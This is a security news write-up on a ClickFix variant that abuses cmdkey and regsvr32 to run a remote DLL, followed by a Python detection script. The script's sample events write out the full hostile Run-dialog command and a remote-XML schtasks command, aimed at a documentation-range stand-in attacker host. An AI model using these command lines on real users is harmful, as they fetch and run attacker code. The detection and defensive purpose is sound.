A new variant of the ClickFix attack has emerged that avoids PowerShell entirely. Instead, it chains cmdkey and regsvr32, two native Windows utilities, to fetch and run a remote payload without writing any file to the victim's disk.
New Approach in Attack Execution
ClickFix has been a persistent threat, relying on social engineering to talk users into running malicious commands themselves. Earlier campaigns used fake CAPTCHA pages to get victims to paste a command into the Windows Run dialog, and that command almost always invoked PowerShell. The latest iteration drops PowerShell altogether, which undermines detections built around PowerShell process creation and script-block logging.
Researchers from CyberProof (Deepak Nayak, Kithu Shajil, and Veena Sagar) documented the variant and published their findings on April 22, 2026. The attack uses a short command sequence that stores credentials, retrieves a remote DLL, and executes it silently through trusted, signed Windows components. Because every step runs inside a legitimate system binary, the activity blends into normal operations and is considerably harder to spot.
Implications for Security Measures
The move from PowerShell to native Windows tools (living-off-the-land binaries, or LOLBins) is a problem for organizations whose behavioral detections key on unusual software installations or unfamiliar processes: every binary involved ships with Windows and runs on every workstation, so process-name and file-drop heuristics alone will not fire.
Starting the attack takes a single command typed into the Windows Run dialog. That one command sets off a multi-stage process that can persist on the host and reach out to attacker-controlled infrastructure. The low barrier means the technique works against a wide range of victims, from home users to corporate environments.
Understanding the Attack Chain
The chain starts when a user lands on a phishing site dressed up as a CAPTCHA verification page. The page tells the user to open the Run dialog with Win + R, paste a command that has already been copied to the clipboard, and press Enter. The command runs under cmd.exe and performs two actions: it uses cmdkey to store credentials for a remote IP address under the username "guest", then uses regsvr32 to silently load a DLL from an SMB share on that attacker-controlled host via a UNC path.
A REM comment reading "I am not a robot" is appended to the command so that the text in the Run box looks like part of the verification step rather than a command line. Once regsvr32 executes the DLL, the DLL makes a hidden CreateProcessA call that registers a scheduled task in Windows Task Scheduler. The task definition is hosted remotely, so the attackers can change what the task does without redeploying the initial DLL, giving them persistent access while leaving minimal traces on the host.
Countermeasures and Recommendations
Security teams should watch for cmdkey invocations that target external IP addresses and for regsvr32 loading DLLs from UNC paths. Alerts should cover chained command execution through cmd.exe (cmdkey and regsvr32 in the same command line) and Task Scheduler activity that references XML task definitions on remote shares. At the network level, outbound SMB and UNC access to the internet should be blocked or, at minimum, closely monitored. Finally, users should be taught to recognize ClickFix-style prompts, since the attack only works if the victim runs the command themselves.
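The following is an added detection example, not code from the CyberProof report or from the article. It encodes the recommendations above as rules over process-creation events shaped like Sysmon Event ID 1 (image, parent image, command line) and runs them against a handful of constructed sample events. The IP addresses come from the TEST-NET documentation ranges, the rule names and the `SAMPLE_EVENTS` records are this example's own, and the "internal" address list is a plain RFC 1918 plus loopback and link-local set; adjust it to your own address plan.

```python
"""Detection rules for the cmdkey + regsvr32 ClickFix variant.

Added example, not the researchers' code. Events are constructed sample
process-creation records modelled on Sysmon Event ID 1 fields.
"""
import ipaddress
import re

# Constructed sample telemetry. 203.0.113.0/24 is a documentation range
# standing in for an attacker-controlled host; nothing here is a real IoC.
SAMPLE_EVENTS = [
    {   # the ClickFix chain as typed into the Run dialog (explorer.exe parent)
        "pid": 4101,
        "image": r"C:\Windows\System32\cmd.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": r"cmd.exe /c cmdkey /add:203.0.113.10 /user:guest & "
                   r"regsvr32 /s \\203.0.113.10\share\verify.dll REM I am not a robot",
    },
    {   # benign: admin caching credentials for an internal file server
        "pid": 4102,
        "image": r"C:\Windows\System32\cmdkey.exe",
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": r"cmdkey /add:10.20.30.40 /user:CORP\svc_backup",
    },
    {   # benign: installer registering a local COM DLL
        "pid": 4103,
        "image": r"C:\Windows\System32\regsvr32.exe",
        "parent": r"C:\Windows\System32\msiexec.exe",
        "cmdline": r'regsvr32 /s "C:\Program Files\Vendor\component.dll"',
    },
    {   # persistence stage: task definition pulled from a remote share
        "pid": 4104,
        "image": r"C:\Windows\System32\schtasks.exe",
        "parent": r"C:\Windows\System32\rundll32.exe",
        "cmdline": r"schtasks /create /tn Updater /xml \\203.0.113.10\share\task.xml",
    },
]

# Address ranges treated as internal; everything else counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]

UNC_PATH = re.compile(r"\\\\[^\s\\]+\\[^\s]+")                # \\host\share\file
CMDKEY_ADD = re.compile(r"\bcmdkey\b.*?/add:([^\s/]+)", re.IGNORECASE)
SCHTASKS_REMOTE_XML = re.compile(r"/xml\s+\\\\", re.IGNORECASE)


def is_external_ip(host):
    """True if host is an IP literal outside INTERNAL_NETS.

    Hostnames return False here: resolve them via DNS/egress telemetry rather
    than guessing from the string.
    """
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def detect(event):
    """Return the names of the rules one process-creation event trips."""
    cmd = event["cmdline"]
    low = cmd.lower()
    hits = []

    # 1. cmdkey storing credentials for a target outside the network
    m = CMDKEY_ADD.search(cmd)
    if m and is_external_ip(m.group(1)):
        hits.append("cmdkey_external_target")

    # 2. regsvr32 loading a DLL through a UNC path
    if "regsvr32" in low and UNC_PATH.search(cmd):
        hits.append("regsvr32_unc_dll")

    # 3. both LOLBins chained in a single cmd.exe command line
    if event["image"].lower().endswith(r"\cmd.exe") and "cmdkey" in low and "regsvr32" in low:
        hits.append("cmd_chained_cmdkey_regsvr32")

    # 4. scheduled task created from an XML definition on a remote share
    if "schtasks" in low and SCHTASKS_REMOTE_XML.search(cmd):
        hits.append("schtasks_remote_xml")

    # Context: Run-dialog launches appear as children of explorer.exe.
    if hits and event.get("parent", "").lower().endswith(r"\explorer.exe"):
        hits.append("launched_from_explorer_run_box")
    return hits


def scan(events):
    """Map pid -> tripped rules for every event that raised at least one."""
    alerts = {}
    for event in events:
        hits = detect(event)
        if hits:
            alerts[event["pid"]] = hits
    return alerts


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

Rules 1 and 2 each fire on their own, so the detection survives the attacker splitting the chain across two Run-dialog prompts; rule 3 is the high-confidence signal because the two utilities have no legitimate reason to share a command line. In a SIEM these would be written against the same fields (Image, ParentImage, CommandLine), with the internal address list replaced by the organization's real ranges.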
